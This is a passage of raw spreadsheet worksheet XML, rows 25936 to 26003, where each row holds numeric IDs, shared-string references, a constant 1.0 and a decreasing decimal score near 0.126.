      <c r="B25936" s="2">
        <v>1.3633524E7</v>
      </c>
      <c r="C25936" s="2" t="s">
        <v>24935</v>
      </c>
      <c r="D25936" s="2">
        <v>1.0</v>
      </c>
      <c r="E25936" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25936" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="25937" ht="15.75" customHeight="1">
      <c r="A25937" s="1">
        <v>23696.0</v>
      </c>
      <c r="B25937" s="2">
        <v>7069879.0</v>
      </c>
      <c r="C25937" s="2" t="s">
        <v>24936</v>
      </c>
      <c r="D25937" s="2">
        <v>1.0</v>
      </c>
      <c r="E25937" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25937" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="25938" ht="15.75" customHeight="1">
      <c r="A25938" s="1">
        <v>29609.0</v>
      </c>
      <c r="B25938" s="2">
        <v>3.3596438E7</v>
      </c>
      <c r="C25938" s="2" t="s">
        <v>24937</v>
      </c>
      <c r="D25938" s="2">
        <v>1.0</v>
      </c>
      <c r="E25938" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25938" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="25939" ht="15.75" customHeight="1">
      <c r="A25939" s="1">
        <v>25003.0</v>
      </c>
      <c r="B25939" s="2">
        <v>1.2721521E7</v>
      </c>
      <c r="C25939" s="2" t="s">
        <v>24938</v>
      </c>
      <c r="D25939" s="2">
        <v>1.0</v>
      </c>
      <c r="E25939" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25939" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="25940" ht="15.75" customHeight="1">
      <c r="A25940" s="1">
        <v>27780.0</v>
      </c>
      <c r="B25940" s="2">
        <v>2.3121278E7</v>
      </c>
      <c r="C25940" s="2" t="s">
        <v>24939</v>
      </c>
      <c r="D25940" s="2">
        <v>1.0</v>
      </c>
      <c r="E25940" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25940" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="25941" ht="15.75" customHeight="1">
      <c r="A25941" s="1">
        <v>32985.0</v>
      </c>
      <c r="B25941" s="2">
        <v>6603805.0</v>
      </c>
      <c r="C25941" s="2" t="s">
        <v>24940</v>
      </c>
      <c r="D25941" s="2">
        <v>1.0</v>
      </c>
      <c r="E25941" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25941" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="25942" ht="15.75" customHeight="1">
      <c r="A25942" s="1">
        <v>25853.0</v>
      </c>
      <c r="B25942" s="2">
        <v>1.4862833E7</v>
      </c>
      <c r="C25942" s="2" t="s">
        <v>24941</v>
      </c>
      <c r="D25942" s="2">
        <v>1.0</v>
      </c>
      <c r="E25942" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25942" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="25943" ht="15.75" customHeight="1">
      <c r="A25943" s="1">
        <v>18816.0</v>
      </c>
      <c r="B25943" s="2">
        <v>5.3919883E7</v>
      </c>
      <c r="C25943" s="2" t="s">
        <v>24942</v>
      </c>
      <c r="D25943" s="2">
        <v>1.0</v>
      </c>
      <c r="E25943" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25943" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="25944" ht="15.75" customHeight="1">
      <c r="A25944" s="1">
        <v>22680.0</v>
      </c>
      <c r="B25944" s="2">
        <v>4.1877801E7</v>
      </c>
      <c r="C25944" s="2" t="s">
        <v>24943</v>
      </c>
      <c r="D25944" s="2">
        <v>1.0</v>
      </c>
      <c r="E25944" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25944" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="25945" ht="15.75" customHeight="1">
      <c r="A25945" s="1">
        <v>28520.0</v>
      </c>
      <c r="B25945" s="2">
        <v>2.6756364E7</v>
      </c>
      <c r="C25945" s="2" t="s">
        <v>24944</v>
      </c>
      <c r="D25945" s="2">
        <v>1.0</v>
      </c>
      <c r="E25945" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25945" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="25946" ht="15.75" customHeight="1">
      <c r="A25946" s="1">
        <v>32841.0</v>
      </c>
      <c r="B25946" s="2">
        <v>6246253.0</v>
      </c>
      <c r="C25946" s="2" t="s">
        <v>24945</v>
      </c>
      <c r="D25946" s="2">
        <v>1.0</v>
      </c>
      <c r="E25946" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25946" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="25947" ht="15.75" customHeight="1">
      <c r="A25947" s="1">
        <v>33722.0</v>
      </c>
      <c r="B25947" s="2">
        <v>8515360.0</v>
      </c>
      <c r="C25947" s="2" t="s">
        <v>24868</v>
      </c>
      <c r="D25947" s="2">
        <v>1.0</v>
      </c>
      <c r="E25947" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25947" s="2">
        <v>0.1268518518518518</v>
      </c>
    </row>
    <row r="25948" ht="15.75" customHeight="1">
      <c r="A25948" s="1">
        <v>27199.0</v>
      </c>
      <c r="B25948" s="2">
        <v>2.0935883E7</v>
      </c>
      <c r="C25948" s="2" t="s">
        <v>24885</v>
      </c>
      <c r="D25948" s="2">
        <v>1.0</v>
      </c>
      <c r="E25948" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25948" s="2">
        <v>0.1266339869281046</v>
      </c>
    </row>
    <row r="25949" ht="15.75" customHeight="1">
      <c r="A25949" s="1">
        <v>12097.0</v>
      </c>
      <c r="B25949" s="2">
        <v>2.6746656E7</v>
      </c>
      <c r="C25949" s="2" t="s">
        <v>24946</v>
      </c>
      <c r="D25949" s="2">
        <v>1.0</v>
      </c>
      <c r="E25949" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25949" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="25950" ht="15.75" customHeight="1">
      <c r="A25950" s="1">
        <v>15289.0</v>
      </c>
      <c r="B25950" s="2">
        <v>4.2420876E7</v>
      </c>
      <c r="C25950" s="2" t="s">
        <v>24947</v>
      </c>
      <c r="D25950" s="2">
        <v>1.0</v>
      </c>
      <c r="E25950" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25950" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="25951" ht="15.75" customHeight="1">
      <c r="A25951" s="1">
        <v>23464.0</v>
      </c>
      <c r="B25951" s="2">
        <v>5.7017822E7</v>
      </c>
      <c r="C25951" s="2" t="s">
        <v>24948</v>
      </c>
      <c r="D25951" s="2">
        <v>1.0</v>
      </c>
      <c r="E25951" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25951" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="25952" ht="15.75" customHeight="1">
      <c r="A25952" s="1">
        <v>9987.0</v>
      </c>
      <c r="B25952" s="2">
        <v>5.6976598E7</v>
      </c>
      <c r="C25952" s="2" t="s">
        <v>24949</v>
      </c>
      <c r="D25952" s="2">
        <v>1.0</v>
      </c>
      <c r="E25952" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25952" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="25953" ht="15.75" customHeight="1">
      <c r="A25953" s="1">
        <v>18790.0</v>
      </c>
      <c r="B25953" s="2">
        <v>5382895.0</v>
      </c>
      <c r="C25953" s="2" t="s">
        <v>24950</v>
      </c>
      <c r="D25953" s="2">
        <v>1.0</v>
      </c>
      <c r="E25953" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25953" s="2">
        <v>0.1264090177133656</v>
      </c>
    </row>
    <row r="25954" ht="15.75" customHeight="1">
      <c r="A25954" s="1">
        <v>9746.0</v>
      </c>
      <c r="B25954" s="2">
        <v>5.6467227E7</v>
      </c>
      <c r="C25954" s="2" t="s">
        <v>24951</v>
      </c>
      <c r="D25954" s="2">
        <v>1.0</v>
      </c>
      <c r="E25954" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25954" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="25955" ht="15.75" customHeight="1">
      <c r="A25955" s="1">
        <v>15429.0</v>
      </c>
      <c r="B25955" s="2">
        <v>4.2939398E7</v>
      </c>
      <c r="C25955" s="2" t="s">
        <v>24952</v>
      </c>
      <c r="D25955" s="2">
        <v>1.0</v>
      </c>
      <c r="E25955" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25955" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="25956" ht="15.75" customHeight="1">
      <c r="A25956" s="1">
        <v>17341.0</v>
      </c>
      <c r="B25956" s="2">
        <v>4.9395171E7</v>
      </c>
      <c r="C25956" s="2" t="s">
        <v>24953</v>
      </c>
      <c r="D25956" s="2">
        <v>1.0</v>
      </c>
      <c r="E25956" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25956" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="25957" ht="15.75" customHeight="1">
      <c r="A25957" s="1">
        <v>24964.0</v>
      </c>
      <c r="B25957" s="2">
        <v>1.2601523E7</v>
      </c>
      <c r="C25957" s="2" t="s">
        <v>24954</v>
      </c>
      <c r="D25957" s="2">
        <v>1.0</v>
      </c>
      <c r="E25957" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25957" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="25958" ht="15.75" customHeight="1">
      <c r="A25958" s="1">
        <v>33829.0</v>
      </c>
      <c r="B25958" s="2">
        <v>8948131.0</v>
      </c>
      <c r="C25958" s="2" t="s">
        <v>24955</v>
      </c>
      <c r="D25958" s="2">
        <v>1.0</v>
      </c>
      <c r="E25958" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25958" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="25959" ht="15.75" customHeight="1">
      <c r="A25959" s="1">
        <v>31226.0</v>
      </c>
      <c r="B25959" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C25959" s="2" t="s">
        <v>24956</v>
      </c>
      <c r="D25959" s="2">
        <v>1.0</v>
      </c>
      <c r="E25959" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25959" s="2">
        <v>0.1261904761904762</v>
      </c>
    </row>
    <row r="25960" ht="15.75" customHeight="1">
      <c r="A25960" s="1">
        <v>9556.0</v>
      </c>
      <c r="B25960" s="2">
        <v>5.6041667E7</v>
      </c>
      <c r="C25960" s="2" t="s">
        <v>24957</v>
      </c>
      <c r="D25960" s="2">
        <v>1.0</v>
      </c>
      <c r="E25960" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25960" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="25961" ht="15.75" customHeight="1">
      <c r="A25961" s="1">
        <v>12197.0</v>
      </c>
      <c r="B25961" s="2">
        <v>2.7494641E7</v>
      </c>
      <c r="C25961" s="2" t="s">
        <v>24958</v>
      </c>
      <c r="D25961" s="2">
        <v>1.0</v>
      </c>
      <c r="E25961" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25961" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="25962" ht="15.75" customHeight="1">
      <c r="A25962" s="1">
        <v>23279.0</v>
      </c>
      <c r="B25962" s="2">
        <v>5.3656315E7</v>
      </c>
      <c r="C25962" s="2" t="s">
        <v>24959</v>
      </c>
      <c r="D25962" s="2">
        <v>1.0</v>
      </c>
      <c r="E25962" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25962" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="25963" ht="15.75" customHeight="1">
      <c r="A25963" s="1">
        <v>23629.0</v>
      </c>
      <c r="B25963" s="2">
        <v>6561523.0</v>
      </c>
      <c r="C25963" s="2" t="s">
        <v>24960</v>
      </c>
      <c r="D25963" s="2">
        <v>1.0</v>
      </c>
      <c r="E25963" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25963" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="25964" ht="15.75" customHeight="1">
      <c r="A25964" s="1">
        <v>24722.0</v>
      </c>
      <c r="B25964" s="2">
        <v>1.1703303E7</v>
      </c>
      <c r="C25964" s="2" t="s">
        <v>24961</v>
      </c>
      <c r="D25964" s="2">
        <v>1.0</v>
      </c>
      <c r="E25964" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25964" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="25965" ht="15.75" customHeight="1">
      <c r="A25965" s="1">
        <v>27214.0</v>
      </c>
      <c r="B25965" s="2">
        <v>2.0966486E7</v>
      </c>
      <c r="C25965" s="2" t="s">
        <v>24962</v>
      </c>
      <c r="D25965" s="2">
        <v>1.0</v>
      </c>
      <c r="E25965" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25965" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="25966" ht="15.75" customHeight="1">
      <c r="A25966" s="1">
        <v>30176.0</v>
      </c>
      <c r="B25966" s="2">
        <v>3.7154027E7</v>
      </c>
      <c r="C25966" s="2" t="s">
        <v>24963</v>
      </c>
      <c r="D25966" s="2">
        <v>1.0</v>
      </c>
      <c r="E25966" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25966" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="25967" ht="15.75" customHeight="1">
      <c r="A25967" s="1">
        <v>32742.0</v>
      </c>
      <c r="B25967" s="2">
        <v>6034558.0</v>
      </c>
      <c r="C25967" s="2" t="s">
        <v>24961</v>
      </c>
      <c r="D25967" s="2">
        <v>1.0</v>
      </c>
      <c r="E25967" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25967" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="25968" ht="15.75" customHeight="1">
      <c r="A25968" s="1">
        <v>3903.0</v>
      </c>
      <c r="B25968" s="2">
        <v>4.0481575E7</v>
      </c>
      <c r="C25968" s="2" t="s">
        <v>24964</v>
      </c>
      <c r="D25968" s="2">
        <v>1.0</v>
      </c>
      <c r="E25968" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25968" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="25969" ht="15.75" customHeight="1">
      <c r="A25969" s="1">
        <v>7308.0</v>
      </c>
      <c r="B25969" s="2">
        <v>5.0852888E7</v>
      </c>
      <c r="C25969" s="2" t="s">
        <v>24965</v>
      </c>
      <c r="D25969" s="2">
        <v>1.0</v>
      </c>
      <c r="E25969" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25969" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="25970" ht="15.75" customHeight="1">
      <c r="A25970" s="1">
        <v>12333.0</v>
      </c>
      <c r="B25970" s="2">
        <v>2.8563772E7</v>
      </c>
      <c r="C25970" s="2" t="s">
        <v>24966</v>
      </c>
      <c r="D25970" s="2">
        <v>1.0</v>
      </c>
      <c r="E25970" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25970" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="25971" ht="15.75" customHeight="1">
      <c r="A25971" s="1">
        <v>28933.0</v>
      </c>
      <c r="B25971" s="2">
        <v>2.9606878E7</v>
      </c>
      <c r="C25971" s="5" t="s">
        <v>24967</v>
      </c>
      <c r="D25971" s="2">
        <v>1.0</v>
      </c>
      <c r="E25971" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25971" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="25972" ht="15.75" customHeight="1">
      <c r="A25972" s="1">
        <v>1881.0</v>
      </c>
      <c r="B25972" s="2">
        <v>2.9718394E7</v>
      </c>
      <c r="C25972" s="2" t="s">
        <v>24968</v>
      </c>
      <c r="D25972" s="2">
        <v>1.0</v>
      </c>
      <c r="E25972" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25972" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25973" ht="15.75" customHeight="1">
      <c r="A25973" s="1">
        <v>2212.0</v>
      </c>
      <c r="B25973" s="2">
        <v>3.2076561E7</v>
      </c>
      <c r="C25973" s="2" t="s">
        <v>24969</v>
      </c>
      <c r="D25973" s="2">
        <v>1.0</v>
      </c>
      <c r="E25973" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25973" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25974" ht="15.75" customHeight="1">
      <c r="A25974" s="1">
        <v>3334.0</v>
      </c>
      <c r="B25974" s="2">
        <v>3.7708451E7</v>
      </c>
      <c r="C25974" s="2" t="s">
        <v>24970</v>
      </c>
      <c r="D25974" s="2">
        <v>1.0</v>
      </c>
      <c r="E25974" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25974" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25975" ht="15.75" customHeight="1">
      <c r="A25975" s="1">
        <v>4120.0</v>
      </c>
      <c r="B25975" s="2">
        <v>4.1359122E7</v>
      </c>
      <c r="C25975" s="5" t="s">
        <v>24971</v>
      </c>
      <c r="D25975" s="2">
        <v>1.0</v>
      </c>
      <c r="E25975" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25975" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25976" ht="15.75" customHeight="1">
      <c r="A25976" s="1">
        <v>6504.0</v>
      </c>
      <c r="B25976" s="2">
        <v>4.872259E7</v>
      </c>
      <c r="C25976" s="2" t="s">
        <v>24972</v>
      </c>
      <c r="D25976" s="2">
        <v>1.0</v>
      </c>
      <c r="E25976" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25976" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25977" ht="15.75" customHeight="1">
      <c r="A25977" s="1">
        <v>9499.0</v>
      </c>
      <c r="B25977" s="2">
        <v>5.5919638E7</v>
      </c>
      <c r="C25977" s="2" t="s">
        <v>24973</v>
      </c>
      <c r="D25977" s="2">
        <v>1.0</v>
      </c>
      <c r="E25977" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25977" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25978" ht="15.75" customHeight="1">
      <c r="A25978" s="1">
        <v>10097.0</v>
      </c>
      <c r="B25978" s="2">
        <v>5.7205139E7</v>
      </c>
      <c r="C25978" s="2" t="s">
        <v>24974</v>
      </c>
      <c r="D25978" s="2">
        <v>1.0</v>
      </c>
      <c r="E25978" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25978" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25979" ht="15.75" customHeight="1">
      <c r="A25979" s="1">
        <v>11594.0</v>
      </c>
      <c r="B25979" s="2">
        <v>2.2906801E7</v>
      </c>
      <c r="C25979" s="2" t="s">
        <v>24975</v>
      </c>
      <c r="D25979" s="2">
        <v>1.0</v>
      </c>
      <c r="E25979" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25979" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25980" ht="15.75" customHeight="1">
      <c r="A25980" s="1">
        <v>11963.0</v>
      </c>
      <c r="B25980" s="2">
        <v>2.562546E7</v>
      </c>
      <c r="C25980" s="2" t="s">
        <v>24976</v>
      </c>
      <c r="D25980" s="2">
        <v>1.0</v>
      </c>
      <c r="E25980" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25980" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25981" ht="15.75" customHeight="1">
      <c r="A25981" s="1">
        <v>13384.0</v>
      </c>
      <c r="B25981" s="2">
        <v>3.4912536E7</v>
      </c>
      <c r="C25981" s="2" t="s">
        <v>24977</v>
      </c>
      <c r="D25981" s="2">
        <v>1.0</v>
      </c>
      <c r="E25981" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25981" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25982" ht="15.75" customHeight="1">
      <c r="A25982" s="1">
        <v>13587.0</v>
      </c>
      <c r="B25982" s="2">
        <v>3.5728209E7</v>
      </c>
      <c r="C25982" s="2" t="s">
        <v>24978</v>
      </c>
      <c r="D25982" s="2">
        <v>1.0</v>
      </c>
      <c r="E25982" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25982" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25983" ht="15.75" customHeight="1">
      <c r="A25983" s="1">
        <v>14935.0</v>
      </c>
      <c r="B25983" s="2">
        <v>4.1248939E7</v>
      </c>
      <c r="C25983" s="2" t="s">
        <v>24979</v>
      </c>
      <c r="D25983" s="2">
        <v>1.0</v>
      </c>
      <c r="E25983" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25983" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25984" ht="15.75" customHeight="1">
      <c r="A25984" s="1">
        <v>15613.0</v>
      </c>
      <c r="B25984" s="2">
        <v>4.3519718E7</v>
      </c>
      <c r="C25984" s="2" t="s">
        <v>24980</v>
      </c>
      <c r="D25984" s="2">
        <v>1.0</v>
      </c>
      <c r="E25984" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25984" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25985" ht="15.75" customHeight="1">
      <c r="A25985" s="1">
        <v>16015.0</v>
      </c>
      <c r="B25985" s="2">
        <v>4.5017423E7</v>
      </c>
      <c r="C25985" s="2" t="s">
        <v>24981</v>
      </c>
      <c r="D25985" s="2">
        <v>1.0</v>
      </c>
      <c r="E25985" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25985" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25986" ht="15.75" customHeight="1">
      <c r="A25986" s="1">
        <v>18045.0</v>
      </c>
      <c r="B25986" s="2">
        <v>5.1560341E7</v>
      </c>
      <c r="C25986" s="2" t="s">
        <v>24982</v>
      </c>
      <c r="D25986" s="2">
        <v>1.0</v>
      </c>
      <c r="E25986" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25986" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25987" ht="15.75" customHeight="1">
      <c r="A25987" s="1">
        <v>18722.0</v>
      </c>
      <c r="B25987" s="2">
        <v>5.3669548E7</v>
      </c>
      <c r="C25987" s="2" t="s">
        <v>24983</v>
      </c>
      <c r="D25987" s="2">
        <v>1.0</v>
      </c>
      <c r="E25987" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25987" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25988" ht="15.75" customHeight="1">
      <c r="A25988" s="1">
        <v>20372.0</v>
      </c>
      <c r="B25988" s="2">
        <v>1.1817314E7</v>
      </c>
      <c r="C25988" s="2" t="s">
        <v>24984</v>
      </c>
      <c r="D25988" s="2">
        <v>1.0</v>
      </c>
      <c r="E25988" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25988" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25989" ht="15.75" customHeight="1">
      <c r="A25989" s="1">
        <v>20553.0</v>
      </c>
      <c r="B25989" s="2">
        <v>1.3388722E7</v>
      </c>
      <c r="C25989" s="2" t="s">
        <v>24985</v>
      </c>
      <c r="D25989" s="2">
        <v>1.0</v>
      </c>
      <c r="E25989" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25989" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25990" ht="15.75" customHeight="1">
      <c r="A25990" s="1">
        <v>21552.0</v>
      </c>
      <c r="B25990" s="2">
        <v>2.3590074E7</v>
      </c>
      <c r="C25990" s="2" t="s">
        <v>24986</v>
      </c>
      <c r="D25990" s="2">
        <v>1.0</v>
      </c>
      <c r="E25990" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25990" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25991" ht="15.75" customHeight="1">
      <c r="A25991" s="1">
        <v>22305.0</v>
      </c>
      <c r="B25991" s="2">
        <v>3.3701739E7</v>
      </c>
      <c r="C25991" s="2" t="s">
        <v>24987</v>
      </c>
      <c r="D25991" s="2">
        <v>1.0</v>
      </c>
      <c r="E25991" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25991" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25992" ht="15.75" customHeight="1">
      <c r="A25992" s="1">
        <v>22417.0</v>
      </c>
      <c r="B25992" s="2">
        <v>3.6041807E7</v>
      </c>
      <c r="C25992" s="2" t="s">
        <v>24988</v>
      </c>
      <c r="D25992" s="2">
        <v>1.0</v>
      </c>
      <c r="E25992" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25992" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25993" ht="15.75" customHeight="1">
      <c r="A25993" s="1">
        <v>22443.0</v>
      </c>
      <c r="B25993" s="2">
        <v>3625053.0</v>
      </c>
      <c r="C25993" s="2" t="s">
        <v>24989</v>
      </c>
      <c r="D25993" s="2">
        <v>1.0</v>
      </c>
      <c r="E25993" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25993" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25994" ht="15.75" customHeight="1">
      <c r="A25994" s="1">
        <v>22695.0</v>
      </c>
      <c r="B25994" s="2">
        <v>4235939.0</v>
      </c>
      <c r="C25994" s="2" t="s">
        <v>24990</v>
      </c>
      <c r="D25994" s="2">
        <v>1.0</v>
      </c>
      <c r="E25994" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25994" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25995" ht="15.75" customHeight="1">
      <c r="A25995" s="1">
        <v>22709.0</v>
      </c>
      <c r="B25995" s="2">
        <v>4.3062377E7</v>
      </c>
      <c r="C25995" s="2" t="s">
        <v>24991</v>
      </c>
      <c r="D25995" s="2">
        <v>1.0</v>
      </c>
      <c r="E25995" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25995" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25996" ht="15.75" customHeight="1">
      <c r="A25996" s="1">
        <v>22944.0</v>
      </c>
      <c r="B25996" s="2">
        <v>4.8871773E7</v>
      </c>
      <c r="C25996" s="2" t="s">
        <v>24992</v>
      </c>
      <c r="D25996" s="2">
        <v>1.0</v>
      </c>
      <c r="E25996" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25996" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25997" ht="15.75" customHeight="1">
      <c r="A25997" s="1">
        <v>23358.0</v>
      </c>
      <c r="B25997" s="2">
        <v>5503813.0</v>
      </c>
      <c r="C25997" s="2" t="s">
        <v>24993</v>
      </c>
      <c r="D25997" s="2">
        <v>1.0</v>
      </c>
      <c r="E25997" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25997" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25998" ht="15.75" customHeight="1">
      <c r="A25998" s="1">
        <v>23379.0</v>
      </c>
      <c r="B25998" s="2">
        <v>5552750.0</v>
      </c>
      <c r="C25998" s="2" t="s">
        <v>24994</v>
      </c>
      <c r="D25998" s="2">
        <v>1.0</v>
      </c>
      <c r="E25998" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25998" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="25999" ht="15.75" customHeight="1">
      <c r="A25999" s="1">
        <v>24268.0</v>
      </c>
      <c r="B25999" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C25999" s="2" t="s">
        <v>24995</v>
      </c>
      <c r="D25999" s="2">
        <v>1.0</v>
      </c>
      <c r="E25999" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25999" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26000" ht="15.75" customHeight="1">
      <c r="A26000" s="1">
        <v>24534.0</v>
      </c>
      <c r="B26000" s="2">
        <v>1.1208273E7</v>
      </c>
      <c r="C26000" s="2" t="s">
        <v>24996</v>
      </c>
      <c r="D26000" s="2">
        <v>1.0</v>
      </c>
      <c r="E26000" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26000" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26001" ht="15.75" customHeight="1">
      <c r="A26001" s="1">
        <v>25207.0</v>
      </c>
      <c r="B26001" s="2">
        <v>1.3225422E7</v>
      </c>
      <c r="C26001" s="2" t="s">
        <v>24997</v>
      </c>
      <c r="D26001" s="2">
        <v>1.0</v>
      </c>
      <c r="E26001" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26001" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26002" ht="15.75" customHeight="1">
      <c r="A26002" s="1">
        <v>25208.0</v>
      </c>
      <c r="B26002" s="2">
        <v>1.3225422E7</v>
      </c>
      <c r="C26002" s="2" t="s">
        <v>24998</v>
      </c>
      <c r="D26002" s="2">
        <v>1.0</v>
      </c>
      <c r="E26002" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26002" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="26003" ht="15.75" customHeight="1">
      <c r="A26003" s="1">
        <v>25391.0</v>
      </c>
      <c r="B26003" s="2">
